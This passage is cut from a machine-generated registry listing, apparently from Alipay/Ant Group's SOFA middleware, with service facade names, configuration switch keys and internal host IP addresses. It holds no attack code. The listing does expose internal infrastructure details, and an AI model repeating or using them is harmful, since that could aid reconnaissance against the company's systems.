@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcommonweal.common.service.facade.api.AcwUserInvoiceFacade:1.0:antcommonweal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydss.common.service.facade.square.UctIndicatorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinstockprod.atomic.service.facade.common.LargeInfiniteSignQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcloudfunds.service.manage.api.StatementListsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ebppcore.facade.RuleCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyImportV2Facade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.charityasset.common.service.facade.api.AssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcinstoperation.common.service.facade.api.orgcontrol.OrgControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.ctokenCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adc.user.facade.UserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.72.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeapcore:name=com.alipay.echo.platform.core.drm.EchoRecordConfigDrm.recordStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudinc:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizrecon.facade.LiquidationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.globalprod.common.service.facade.file.FileManagerFacade:1.0.0:globalprod_tfs@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.content.PcacSceneContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.messagebox.MessageBoxFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiancore.common.service.InsClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_TRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lendpofprod.common.service.facade.ldc.proxy.LdcLendMessageProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.87.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintradecenter.core.service.repository.AssetLoanRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promoplatform_CCBTaskProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.GlobalSearchRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.SendMpaasPushService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.drm.SlaveQueryDrm.starWishAuthLoadSlave,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.astaralarm.common.service.facade.tvm.VulViewManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.202.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.payment.common.api.AssetConsultService:1.0:paydecision3WkEbank@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","fcservice@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.prodcore.service.transfer.api.MainFCProductUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.core.service.hbase.MCubeInfoCacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.198.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:ecocheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.shop.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:logisticfinanceprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.52.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mshopprod.common.service.facade.ShopApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityservice.facade.interactiveservice.InteractiveRiskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:instservicecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.kashi.task.KsTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbdatafactory.common.service.facade.realtime.RealtimeDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.unitradeprod.common.facade.test.OrderPaymentFacadeWSTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.notify.management.service.MsgDeliveryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.MarketHotspotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.paramcore.common.service.manage.facade.api.sync.ParmSchemaMetaSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gffund.common.service.facade.api.FundBizCodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.ability.RopDataSourceFacade:1.0:miniProgramAppVersion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.bus.client.drm.BusClientDrmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.130.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.98.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dassmeta.common.service.facade.dds.api.ServiceConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:cfloancore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ifxposition.service.facade.book.FxBookManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FPORGASSETDECISION#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insserviceprod.facade.InsServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.biz.shared.qrcode.CustomQrcodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.outsideasset.facade.OutsideAssetBindRelationQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.fmcgcore.common.service.facade.registration.api.EnterRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_tyaowei#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityprod.common.service.facade.mobileconvoy.MobileConvoyCheckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomerweb.common.service.facade.AliyunAccountManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilepromo.common.service.facade.resultpage.ResultPageRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.InstL2AccountManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.common.ChinaDistrictQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.204.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchcommerce.pms.common.service.facade.api.MobileClientUpPolicyMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.242.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.adpc.common.service.facade.DataApplicationConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acappcore.biz.buildpack.internal.rest.BuildpackInternalRest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.service.DataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mrchcommerce.core.api.biz.shopinfo.ShopInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkmportal.service.loan.api.LoanBizProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:apires@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchselfop.common.service.facade.operation.CategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.ipaytair#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:zhimago_timeout_settle_recovery@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.api.FluxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1208_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:obstaclemap@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudstrategy.facade.onekeysite.OneKeyDownSiteCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paybatch.common.service.facade.spi.OrderExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.RuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpDeliverGroupMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.batch.repository.BusinessStageDependencyRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.service.runtime.BaselineQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.securitycap.securityCapNormalDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dss.endpoint.rest.facade.MetaDataRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.aliinvoiceprod.common.service.facade.api.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.amspm.ardd.common.support.api.ScriptDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:tnpmbuild#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.180.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cardSceneEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.useLoadTestTair,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantProfileQueryFacade:1.0:mifcz-merchantProfileQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.yebcore:name=com.alipay.yebcore.core.shared.drm.impl.PurchaseLimitDrmImpl.limitAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-antmember-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finquotationcenter.common.service.facade.api.SvQuotationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imatchfacade.common.service.facade.crowd.RealTimeCrowdApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.needSucContractNumFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.smcp.facade.securityexplore.AeUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.ALIPAYINTLJSESSIONID.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antmember.common.service.facade.goldeneye.PatekGoldenEyeCrowdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.query.AccOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.biz.service.cooperation.facade.ParticipantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:overseatwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:finsign@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-S-AML#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.160.159.214#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.adbasiclib.ad.facade.AdServiceFacade:1.0:rtb-dsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.bizPromoInsight.ruleCenter.PmsCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.57.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.38.50.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.budgetcore.core.model.budget.BudgetRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.sprMinProfitRatePercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.merchant.open.facade.api.PluginSuiteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.overseamerchant.api.OSMerchanttransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.communication.api.CommunicationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.encrypt.EncryptQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdp.common.service.facade.mng.CreativePoolMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.flowsdk.spi.FlowRouteService:1.0:simulabcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.openIsvForMerchantGrayPercentage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.facade.service.TestDataQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.sampleRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zauth:name=com.alipay.zpaas.zauth.client.util.UseLocalSessionSwitchConfig.isUseLocalSession,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mytradeprod.common.service.facade.ContactRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openauth.common.service.facade.request.RequestTokenManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.LeviathanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.99.23#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.revcore.common.service.facade.api.dailycut.DailyCutService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.taskcenter.TaskMessageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:esmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.IndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.TaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.outflux.OutfluxRequestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincorecheck.common.service.facade.bizcheck.FundFlowPlusDataCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.v2.ShopManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.reverseapply.AssetReverseSupplierApplyRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_INSURE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opssla.common.service.facade.SlaRuleDataMigrationService:1.0:opssla@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygrowth.common.service.facade.channel.ChannelOperationStrategyActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.miniapp.SignFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_mock_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sccore.facade.ZimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.sigmaAliOverQuotaMem,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:lifecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.zdatabusExchangeCodeBlacklist,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mquery.common.service.facade.BatchFundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITCOOP#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.community.CommunityPropertyMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.ChargeConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_resourceMapperGatewayFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_intelligent_deposit_balance_limit_white_list_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveMngAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.claim.creditorsright.service.CreditorsRightTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.smartcacheUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.processmng:name=com.alipay.zcache.log.processmng.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.biz.service.impl.rpc.IntelligentRecommendFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imtmsvcprod.common.service.facade.common.DistrictAreaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:minitranscloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.SuspendInstructionConfigDRM.targetCodeList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iassetcenter.service.facade.api.write.UserAssetProfileService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.merchant.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.160.159.139#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.39.129.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointcore.common.service.facade.DepositbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.ruleEntrance.service.ModelPredictService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.94.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agdscsalipay.common.service.facade.names.RiskSegInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intel.service.api.fund.BalanceFreezeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.afsc.common.service.tianxun.service.TxKeyWordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatafactory.common.service.facade.datasource.DataConsumeRouterQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.biz.certificatesdeposit.service.CertificatesDepositAssistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.chargefront.core.service.config.ChargeFrontCommonDrm.transferSwtichs,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsettle.biz.service.prepaycard.api.PcardSettleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","id.dana.bizcenter.common.service.facade.api.BizGoodsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.falcon.common.facade.TagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmhatcher.common.service.facade.api.ActivityInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.biz.promoworkbench.navigator.DefaultNavManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","ecocheck@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.common.service.facade.trade.test.FintradeOrderServiceAutomatedTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:stockvirtual@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.findatacanal.common.service.manage.gildata.GdDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.clientGrayStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.234.146#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservcenter.biz.shared.batch.BatchOrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityProjectProvinceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finorm.biz.facade.api.HbaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:sigma@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.146.187#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INS